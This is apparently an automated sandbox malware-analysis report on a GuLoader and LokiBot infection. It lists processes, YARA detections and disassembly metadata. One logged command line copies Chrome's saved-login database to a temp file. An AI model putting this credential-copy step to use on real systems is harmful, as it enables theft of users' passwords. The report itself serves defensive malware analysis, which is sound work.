Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: c8ahotgz8h.exe PID: 5500 Parent PID: 4644

General

Start time:	12:59:40
Start date:	25/11/2021
Path:	C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe
Wow64 process (32bit):	true
Commandline:	C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe
Imagebase:	0x400000
File size:	144472 bytes
MD5 hash:	812181DF251E06433BF2F4F6A0C0F0F4
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	Visual Basic
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000016.00000002.51080501754.0000000002290000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Analysis Process: cmd.exe PID: 4808 Parent PID: 4624

General

Start time:	12:59:45
Start date:	25/11/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	/c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V
Imagebase:	0x320000
File size:	236544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: conhost.exe PID: 4948 Parent PID: 4808

General

Start time:	12:59:45
Start date:	25/11/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6f4340000
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: firefox.exe PID: 5640 Parent PID: 4624

General

Start time:	12:59:46
Start date:	25/11/2021
Path:	C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit):	false
Commandline:	C:\Program Files\Mozilla Firefox\Firefox.exe
Imagebase:	0x7ff788ee0000
File size:	597432 bytes
MD5 hash:	FA9F4FC5D7ECAB5A20BF7A9D1251C851
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: LokiBot_Dropper_Packed_R11_Feb18, Description: Auto-generated rule - file scan copy.pdf.r11, Source: 00000019.00000000.50661482100.0000000040097000.00000004.00020000.sdmp, Author: Florian Roth Rule: LokiBot_Dropper_Packed_R11_Feb18, Description: Auto-generated rule - file scan copy.pdf.r11, Source: 00000019.00000002.50719644805.0000000040097000.00000004.00020000.sdmp, Author: Florian Roth Rule: LokiBot_Dropper_Packed_R11_Feb18, Description: Auto-generated rule - file scan copy.pdf.r11, Source: 00000019.00000000.50714091090.0000000040097000.00000004.00020000.sdmp, Author: Florian Roth
Reputation:	moderate

Chronological Activities

Analysis Process: c8ahotgz8h.exe PID: 7504 Parent PID: 4644

General

Start time:	12:59:53
Start date:	25/11/2021
Path:	C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe"
Imagebase:	0x400000
File size:	144472 bytes
MD5 hash:	812181DF251E06433BF2F4F6A0C0F0F4
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	Visual Basic
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 0000001A.00000002.51208710920.0000000002290000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Analysis Process: c8ahotgz8h.exe PID: 6900 Parent PID: 4644

General

Start time:	13:00:00
Start date:	25/11/2021
Path:	C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe"
Imagebase:	0x400000
File size:	144472 bytes
MD5 hash:	812181DF251E06433BF2F4F6A0C0F0F4
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	Visual Basic
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 0000001B.00000002.51291049340.0000000002320000.00000040.00000001.sdmp, Author: Joe Security

Chronological Activities

Analysis Process: c8ahotgz8h.exe PID: 5908 Parent PID: 5500

General

Start time:	13:00:27
Start date:	25/11/2021
Path:	C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe
Wow64 process (32bit):	true
Commandline:	C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe
Imagebase:	0x400000
File size:	144472 bytes
MD5 hash:	812181DF251E06433BF2F4F6A0C0F0F4
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 0000001C.00000000.51076893477.0000000000560000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 0000001C.00000002.51534694546.0000000000560000.00000040.00000001.sdmp, Author: Joe Security

Chronological Activities

Analysis Process: c8ahotgz8h.exe PID: 2508 Parent PID: 7504

General

Start time:	13:00:40
Start date:	25/11/2021
Path:	C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe"
Imagebase:	0x400000
File size:	144472 bytes
MD5 hash:	812181DF251E06433BF2F4F6A0C0F0F4
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 0000001D.00000000.51204349057.0000000000560000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 0000001D.00000002.51661508770.0000000000560000.00000040.00000001.sdmp, Author: Joe Security

Chronological Activities

Analysis Process: c8ahotgz8h.exe PID: 7388 Parent PID: 6900

General

Start time:	13:00:48
Start date:	25/11/2021
Path:	C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe"
Imagebase:	0x400000
File size:	144472 bytes
MD5 hash:	812181DF251E06433BF2F4F6A0C0F0F4
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 0000001E.00000000.51287210518.0000000000560000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 0000001E.00000002.51740663183.0000000000560000.00000040.00000001.sdmp, Author: Joe Security

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: Zr26f1rL6r.exe PID: 6656 Parent PID: 3436 Zr26f1rL6r.exeCOMMON

Execution Graph

Execution Coverage:	5.7%
Dynamic/Decrypted Code Coverage:	88.7%
Signature Coverage:	72.7%
Total number of Nodes:	417
Total number of Limit Nodes:	9

Executed Functions

Function 02320754, Relevance: 15.4, APIs: 2, Strings: 6, Instructions: 1433COMMON

Download Yara Rule

Strings

U=b, xrefs: 0231B67C
yW^g, xrefs: 02320D53
yW^g, xrefs: 02320D58
H+m, xrefs: 0231A66D
Sm!|, xrefs: 02320800
}#c, xrefs: 0231A819

Memory Dump Source

Source File: 00000002.00000002.47312005259.0000000002310000.00000040.00000001.sdmp, Offset: 02310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2310000_Zr26f1rL6r.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: H+m$Sm!|$U=b$yW^g$yW^g$}#c
API String ID: 1029625771-3546614695
Opcode ID: b25ad30a1668fc697cae4d556328b75ab030e8700c26f52e12ad15845b43da56
Instruction ID: b4fe1132c84bbc538755cc38855f776d0f1566cd9ffb88bb36d9e2fd992d40d3
Opcode Fuzzy Hash: b25ad30a1668fc697cae4d556328b75ab030e8700c26f52e12ad15845b43da56
Instruction Fuzzy Hash: 37B2457160434ADFDF389E38CDA57DA77A2EF55390F95812ECC8A8B644D3348986CB42

Uniqueness

Uniqueness Score: -1.00%

Function 023206A2, Relevance: 13.5, APIs: 2, Strings: 5, Instructions: 1270
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

U=b, xrefs: 0231B67C
";Jm, xrefs: 0231BD2A
H+m, xrefs: 0231A66D
EK], xrefs: 02311450
}#c, xrefs: 0231A819

Memory Dump Source

Source File: 00000002.00000002.47312005259.0000000002310000.00000040.00000001.sdmp, Offset: 02310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2310000_Zr26f1rL6r.jbxd

Yara matches

Similarity

API ID:
String ID: ";Jm$H+m$U=b$}#c$EK]
API String ID: 0-2571250244
Opcode ID: bf261497893e39f3039709f5d46a258c7f0e38190c55d119bc3c0cff89927007
Instruction ID: ad64a07d2f1797803a65e1e2422d6949192abd30e2a7b73673712200b60521da
Opcode Fuzzy Hash: bf261497893e39f3039709f5d46a258c7f0e38190c55d119bc3c0cff89927007
Instruction Fuzzy Hash: 25A265716043499FDF389E38CDA57DA7BA2FF55350F55822EDC8A8B644D3348986CB02

Uniqueness

Uniqueness Score: -1.00%

Function 0231CE0C, Relevance: 12.0, APIs: 2, Strings: 4, Instructions: 1452COMMON

Download Yara Rule

Strings

U=b, xrefs: 0231B67C
H+m, xrefs: 0231A66D
EK], xrefs: 02311450
}#c, xrefs: 0231A819

Memory Dump Source

Source File: 00000002.00000002.47312005259.0000000002310000.00000040.00000001.sdmp, Offset: 02310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2310000_Zr26f1rL6r.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: H+m$U=b$}#c$EK]
API String ID: 1029625771-1197094480
Opcode ID: 9c1266785c6c9d9e36aa5d864a4ddad85704eb102607fa07e707892b557e1af2
Instruction ID: 7b851b94cb1fc747ade07a039588149bb390205655d6c55e48879a5e1097045d
Opcode Fuzzy Hash: 9c1266785c6c9d9e36aa5d864a4ddad85704eb102607fa07e707892b557e1af2
Instruction Fuzzy Hash: 85C2587160434A9FDF389E38CDA57DE77A6EF55390F95812ECC8A8B644D7308986CB02

Uniqueness

Uniqueness Score: -1.00%

Function 0232322B, Relevance: 8.0, APIs: 1, Strings: 3, Instructions: 994
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

U=b, xrefs: 0231B67C
H+m, xrefs: 0231A66D
}#c, xrefs: 0231A819

Memory Dump Source

Source File: 00000002.00000002.47312005259.0000000002310000.00000040.00000001.sdmp, Offset: 02310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2310000_Zr26f1rL6r.jbxd

Yara matches

Similarity

API ID:
String ID: H+m$U=b$}#c
API String ID: 0-2772983987
Opcode ID: 2aef98ef99f011ee8b908cc3cde207ca856713a6bbfa09b22cf635480b570d91
Instruction ID: fc311f0b3637a19052863c02981e271f087ca8da113988a971a2a777995a1f84
Opcode Fuzzy Hash: 2aef98ef99f011ee8b908cc3cde207ca856713a6bbfa09b22cf635480b570d91
Instruction Fuzzy Hash: BD82327160434A9FDF349E38CDA53EE7BA2EF55390F95822EDC8A8B654D3348585CB02

Uniqueness

Uniqueness Score: -1.00%

Function 02322AD2, Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 305
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

);J, xrefs: 02322D08
EK], xrefs: 02311450

Memory Dump Source

Source File: 00000002.00000002.47312005259.0000000002310000.00000040.00000001.sdmp, Offset: 02310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2310000_Zr26f1rL6r.jbxd

Yara matches

Similarity

API ID:
String ID: );J$EK]
API String ID: 0-1158390361
Opcode ID: a4b92d3d0d7d265f08df846bb82963276782873b54e4a78cca23913e034de93d
Instruction ID: 536e1ae772702ae8bacbfb3c363d369544bc7775434566ecb4e4baec9f49ac40
Opcode Fuzzy Hash: a4b92d3d0d7d265f08df846bb82963276782873b54e4a78cca23913e034de93d
Instruction Fuzzy Hash: 4EB17930A04359CFDF38AE34CDA43EA37A2EF55350F49452ACC8A8F655D735998ACB42

Uniqueness

Uniqueness Score: -1.00%

Function 0231C88B, Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 242
memorylibrarynativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtAllocateVirtualMemory.NTDLL(8D05082D,?,-00000001EF38FF1E), ref: 0231CBC8
LoadLibraryA.KERNELBASE(?,?,?,4A82DAC6,023104DF,16EF18E8,0231E3FE,00000000,0231042E), ref: 0231F4E6

Strings

U=b, xrefs: 0231B67C

Memory Dump Source

Source File: 00000002.00000002.47312005259.0000000002310000.00000040.00000001.sdmp, Offset: 02310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2310000_Zr26f1rL6r.jbxd

Yara matches

Similarity

API ID: AllocateLibraryLoadMemoryVirtual
String ID: U=b
API String ID: 2616484454-117013522
Opcode ID: c3e6492804730bdffc58052f636a2bff474bc7b25ae8e1f45e2bd308a4fdb406
Instruction ID: 3749e4aad45e1084f6d8707bf450460831abfbbcadaf5b0e243297d2dfb141d4
Opcode Fuzzy Hash: c3e6492804730bdffc58052f636a2bff474bc7b25ae8e1f45e2bd308a4fdb406
Instruction Fuzzy Hash: 31817DB1A0035ADFCF389E689DA43EA36B7EF95390F94013ADC499B255D7318A42CB11

Uniqueness

Uniqueness Score: -1.00%

Function 02321161, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 216
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

EK], xrefs: 02311450

Memory Dump Source

Source File: 00000002.00000002.47312005259.0000000002310000.00000040.00000001.sdmp, Offset: 02310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2310000_Zr26f1rL6r.jbxd

Yara matches

Similarity

API ID:
String ID: EK]
API String ID: 0-1532622298
Opcode ID: a0cba0a81fb308cf4c3a5c258c041078d070c32af104d5bf65bead1deba37b65
Instruction ID: 26cb6b27af9464621b3e3c2220562441ff10510a1298e7dc819e4c332ced95f1
Opcode Fuzzy Hash: a0cba0a81fb308cf4c3a5c258c041078d070c32af104d5bf65bead1deba37b65
Instruction Fuzzy Hash: 0961DC716003499FDF399E748AA43DB37AAEF963A0F55041ECC8ACBA01D731C986CB01

Uniqueness

Uniqueness Score: -1.00%

Function 0231FFED, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 171
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

`, xrefs: 023201E0

Memory Dump Source

Source File: 00000002.00000002.47312005259.0000000002310000.00000040.00000001.sdmp, Offset: 02310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2310000_Zr26f1rL6r.jbxd

Yara matches

Similarity

API ID:
String ID: `
API String ID: 0-1850852036
Opcode ID: 021217d6e82f315ae35b3563ff0eb4a17839efee1226da9567c98cd0f92d8134
Instruction ID: d99cbd83723daf9f3c4adf44e598e6c7e5979a22b35a0e593540556d927706d7
Opcode Fuzzy Hash: 021217d6e82f315ae35b3563ff0eb4a17839efee1226da9567c98cd0f92d8134
Instruction Fuzzy Hash: 0B518F7660076ACFDF385E294E683DA33A7EFB13A0FDA402ACC4957601D775494ACB41

Uniqueness

Uniqueness Score: -1.00%

Function 023223E2, Relevance: 1.5, APIs: 1, Instructions: 43
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtProtectVirtualMemory.NTDLL(-11417B1E,?,?,?,?,023215C1,12BC0BD0,0231A728), ref: 023224F5

Memory Dump Source

Source File: 00000002.00000002.47312005259.0000000002310000.00000040.00000001.sdmp, Offset: 02310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2310000_Zr26f1rL6r.jbxd

Yara matches

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: 1670dfe0295b295c956e32a55cfa435958ec75999ae85247dfb3362f5119314a
Instruction ID: 1bb8b46ccdc0643b448b912d708b219767603af407ae12aeee348716eb04518f
Opcode Fuzzy Hash: 1670dfe0295b295c956e32a55cfa435958ec75999ae85247dfb3362f5119314a
Instruction Fuzzy Hash: 81017CB46043A98FDF30CE68C8D87DA7695FB9D700F81412AAD4DAB305C6715E8ACB61

Uniqueness

Uniqueness Score: -1.00%

Function 02312386, Relevance: .1, Instructions: 132COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.47312005259.0000000002310000.00000040.00000001.sdmp, Offset: 02310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2310000_Zr26f1rL6r.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 263823a9383cfc15d3ea323d198b1a46e41557d48698b523c2a2fe07229f2b2b
Instruction ID: 19c2f48ecc2611bf57b9894da1fec6a65550607af3a81a5c3df7dc3e6da1cd25
Opcode Fuzzy Hash: 263823a9383cfc15d3ea323d198b1a46e41557d48698b523c2a2fe07229f2b2b
Instruction Fuzzy Hash: 37415B32108595CFD72ECF3CC8852D77BA1EF56238B182B9EC9A98B493C3289017CB51

Uniqueness

Uniqueness Score: -1.00%

Function 0041E8A0, Relevance: 98.3, APIs: 51, Strings: 5, Instructions: 327
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

#574.MSVBVM60(?), ref: 0041E8FB
__vbaStrMove.MSVBVM60 ref: 0041E906
__vbaStrCmp.MSVBVM60(00403564,00000000), ref: 0041E912
__vbaFreeStr.MSVBVM60 ref: 0041E925
__vbaFreeVar.MSVBVM60 ref: 0041E934
#613.MSVBVM60(?,00000002), ref: 0041E952
__vbaStrVarMove.MSVBVM60(?), ref: 0041E962
__vbaStrMove.MSVBVM60 ref: 0041E969
__vbaFreeVarList.MSVBVM60(00000002,00000002,?), ref: 0041E979
#612.MSVBVM60(00000002), ref: 0041E986
__vbaStrVarMove.MSVBVM60(00000002), ref: 0041E990
__vbaStrMove.MSVBVM60 ref: 0041E997
__vbaFreeVar.MSVBVM60 ref: 0041E9A0
__vbaNew2.MSVBVM60(00403940,00420010), ref: 0041E9B5
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041E9CE
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,004034F8,00000130), ref: 0041E9F5
#690.MSVBVM60(UNIGNORANTLY,Layoutet9,sportsheltes,?), ref: 0041EA0E
__vbaFreeStr.MSVBVM60 ref: 0041EA17
__vbaFreeObj.MSVBVM60 ref: 0041EA20
__vbaNew2.MSVBVM60(00403940,00420010), ref: 0041EA39
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041EA52
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,004035C4,000000A8), ref: 0041EA79
__vbaFileOpen.MSVBVM60(00000020,000000FF,000000AB,?), ref: 0041EA8C
__vbaFreeStr.MSVBVM60 ref: 0041EA95
__vbaFreeObj.MSVBVM60 ref: 0041EA9E
#692.MSVBVM60(00000002,Untaunting,Fakkels), ref: 0041EAB2
__vbaVarTstNe.MSVBVM60(?,00000002), ref: 0041EACA
__vbaFreeVar.MSVBVM60 ref: 0041EAD6
#536.MSVBVM60(00000002), ref: 0041EAF0
__vbaStrMove.MSVBVM60 ref: 0041EAFB
__vbaFreeVar.MSVBVM60 ref: 0041EB04
__vbaNew2.MSVBVM60(00403488,004204D8), ref: 0041EB18
__vbaHresultCheckObj.MSVBVM60(00000000,0234EA7C,00403478,00000014), ref: 0041EB43
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403498,00000130), ref: 0041EB71
__vbaStrMove.MSVBVM60 ref: 0041EB7C
__vbaFreeObj.MSVBVM60 ref: 0041EB85
__vbaNew2.MSVBVM60(00403488,004204D8), ref: 0041EB9D
__vbaHresultCheckObj.MSVBVM60(00000000,0234EA7C,00403478,00000014), ref: 0041EBC2
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403498,000000F0), ref: 0041EBE8
__vbaStrMove.MSVBVM60 ref: 0041EBF3
__vbaFreeObj.MSVBVM60 ref: 0041EBFC
__vbaNew2.MSVBVM60(00403940,00420010), ref: 0041EC15
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041EC2E
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,004034E8,00000108), ref: 0041EC55
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402E04,0000015C), ref: 0041EC79
__vbaFreeObj.MSVBVM60 ref: 0041EC7E
__vbaFreeStr.MSVBVM60(0041ECDF), ref: 0041ECC8
__vbaFreeStr.MSVBVM60 ref: 0041ECCD
__vbaFreeStr.MSVBVM60 ref: 0041ECD2
__vbaFreeStr.MSVBVM60 ref: 0041ECD7
__vbaFreeStr.MSVBVM60 ref: 0041ECDC

Strings

UNIGNORANTLY, xrefs: 0041EA09
Fakkels, xrefs: 0041EAA4
sportsheltes, xrefs: 0041E9FF
Layoutet9, xrefs: 0041EA04
Untaunting, xrefs: 0041EAA9

Memory Dump Source

Source File: 00000002.00000002.47310862985.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.47310843756.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.47311008132.0000000000420000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.47311035451.0000000000422000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Zr26f1rL6r.jbxd

Similarity

API ID: __vba$Free$CheckHresultMove$New2$#536#574#612#613#690#692FileListOpen
String ID: Fakkels$Layoutet9$UNIGNORANTLY$Untaunting$sportsheltes
API String ID: 1405222031-2842152946
Opcode ID: 410be91c31f27679d8d3c6b6c3d9263006ca6c134554781323ce623a53d21b29
Instruction ID: 9397be05867e9acc0c7cc8e09b162062c1115f94f3f82311650de7be55ba3f8b
Opcode Fuzzy Hash: 410be91c31f27679d8d3c6b6c3d9263006ca6c134554781323ce623a53d21b29
Instruction Fuzzy Hash: 76C16175940218AFCB14DFA1ED49EDDBBB8FF58701F20402AF542B72A0DA746A45CB68

Uniqueness

Uniqueness Score: -1.00%

Function 0041EDF0, Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 118
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__vbaVarDup.MSVBVM60 ref: 0041EE4D
#645.MSVBVM60(?,00000000), ref: 0041EE58
__vbaStrMove.MSVBVM60 ref: 0041EE63
__vbaFreeVar.MSVBVM60 ref: 0041EE6C
__vbaNew2.MSVBVM60(00403940,00420010), ref: 0041EE85
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041EEA4
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,004034E8,00000220), ref: 0041EEE9
__vbaFreeObj.MSVBVM60 ref: 0041EEF8
__vbaNew2.MSVBVM60(00403940,00420010), ref: 0041EF0D
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041EF26
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,004034E8,00000168), ref: 0041EF49
__vbaFreeObj.MSVBVM60 ref: 0041EF58
__vbaFreeStr.MSVBVM60(0041EF7E), ref: 0041EF77

Strings

Ligegodt2, xrefs: 0041EE3F

Memory Dump Source

Source File: 00000002.00000002.47310862985.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.47310843756.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.47311008132.0000000000420000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.47311035451.0000000000422000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Zr26f1rL6r.jbxd

Similarity

API ID: __vba$Free$CheckHresultNew2$#645Move
String ID: Ligegodt2
API String ID: 849906774-2200858921
Opcode ID: 975cf3d7f45bd02f2042760a2ecbbb8d7be647d7dd69bb2b569cf4ca8f249633
Instruction ID: aebb2009344ea3902930888327dc30f4699e9c7ef4335fc7673b645bd6dd503d
Opcode Fuzzy Hash: 975cf3d7f45bd02f2042760a2ecbbb8d7be647d7dd69bb2b569cf4ca8f249633
Instruction Fuzzy Hash: A5414CB4A00218EFCB14DFA4DD88E9EBBB8FF48700F10852AF945B7291D7745945CB98

Uniqueness

Uniqueness Score: -1.00%

Function 0231BF1C, Relevance: 1.6, APIs: 1, Instructions: 137
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE(?,?,?,4A82DAC6,023104DF,16EF18E8,0231E3FE,00000000,0231042E), ref: 0231F4E6

Memory Dump Source

Source File: 00000002.00000002.47312005259.0000000002310000.00000040.00000001.sdmp, Offset: 02310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2310000_Zr26f1rL6r.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 4dde117c9ab0f498474159960d817822d2740f54e3fa7f55f575a93b40af4ef9
Instruction ID: 2906d8c82db5adb5142cae07adc322d6b30304c444fa37a7d23bafda94b97cf8
Opcode Fuzzy Hash: 4dde117c9ab0f498474159960d817822d2740f54e3fa7f55f575a93b40af4ef9
Instruction Fuzzy Hash: 21417B7620435ADFCB389F684CF43DB2366AF957F0F90031BCC6A9B582DB3689458652

Uniqueness

Uniqueness Score: -1.00%

Function 0231BE04, Relevance: 1.6, APIs: 1, Instructions: 104
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE(?,?,?,4A82DAC6,023104DF,16EF18E8,0231E3FE,00000000,0231042E), ref: 0231F4E6

Memory Dump Source

Source File: 00000002.00000002.47312005259.0000000002310000.00000040.00000001.sdmp, Offset: 02310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2310000_Zr26f1rL6r.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 72ba87792771cc4dd5f6310a94303021875a3260cf59806d4016084067a7ab69
Instruction ID: 280167148f8d3807ab1302a21e41638414919d66cff308fca2bb9b268000c50e
Opcode Fuzzy Hash: 72ba87792771cc4dd5f6310a94303021875a3260cf59806d4016084067a7ab69
Instruction Fuzzy Hash: FA318876604359DBCF382F349CA03EA636BAF85BA0F91051FDC469BA41E7318D80CB52

Uniqueness

Uniqueness Score: -1.00%

Function 0231C02C, Relevance: 1.6, APIs: 1, Instructions: 94
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE(?,?,?,4A82DAC6,023104DF,16EF18E8,0231E3FE,00000000,0231042E), ref: 0231F4E6

Memory Dump Source

Source File: 00000002.00000002.47312005259.0000000002310000.00000040.00000001.sdmp, Offset: 02310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2310000_Zr26f1rL6r.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 32ec042b3a3ff8751d5e3830c917f679b5f0892ab36ffb89ee1e3e064fc07b13
Instruction ID: 4df3f3f008f20e084b2283c4667ab88a681f46d351543f1bd1c7f99106b58691
Opcode Fuzzy Hash: 32ec042b3a3ff8751d5e3830c917f679b5f0892ab36ffb89ee1e3e064fc07b13
Instruction Fuzzy Hash: D4318C766003189BCF38AE264D943DE277BAFD4790FAA8417DC09DB601D731CD468A51

Uniqueness

Uniqueness Score: -1.00%

Function 0231F3EE, Relevance: 1.6, APIs: 1, Instructions: 57
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE(?,?,?,4A82DAC6,023104DF,16EF18E8,0231E3FE,00000000,0231042E), ref: 0231F4E6

Memory Dump Source

Source File: 00000002.00000002.47312005259.0000000002310000.00000040.00000001.sdmp, Offset: 02310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2310000_Zr26f1rL6r.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 3ab1af08f2225e6075ab4171d93c1445c702b81fa469aa8eeef3256d0b180e45
Instruction ID: 4802b955aac0d5425a0eb79970221d68e347739a2e1f974f2758745a6f022c85
Opcode Fuzzy Hash: 3ab1af08f2225e6075ab4171d93c1445c702b81fa469aa8eeef3256d0b180e45
Instruction Fuzzy Hash: D5118E716013299BCF346F2559A43CB237AAFC8790FA5401BDC49DB601DB71CD418B51

Uniqueness

Uniqueness Score: -1.00%

Function 02313800, Relevance: 1.5, APIs: 1, Instructions: 46
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

TerminateProcess.KERNELBASE ref: 0231C1BE

Memory Dump Source

Source File: 00000002.00000002.47312005259.0000000002310000.00000040.00000001.sdmp, Offset: 02310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2310000_Zr26f1rL6r.jbxd

Yara matches

Similarity

API ID: ProcessTerminate
String ID:
API String ID: 560597551-0
Opcode ID: fef95deefe1bdea80e374594cdcf887aad249fa194f619d99be148cb413548ad
Instruction ID: 63ace5413893efa4cdf7f6898d8a4507fd651791bcc273fb7469812882a2f387
Opcode Fuzzy Hash: fef95deefe1bdea80e374594cdcf887aad249fa194f619d99be148cb413548ad
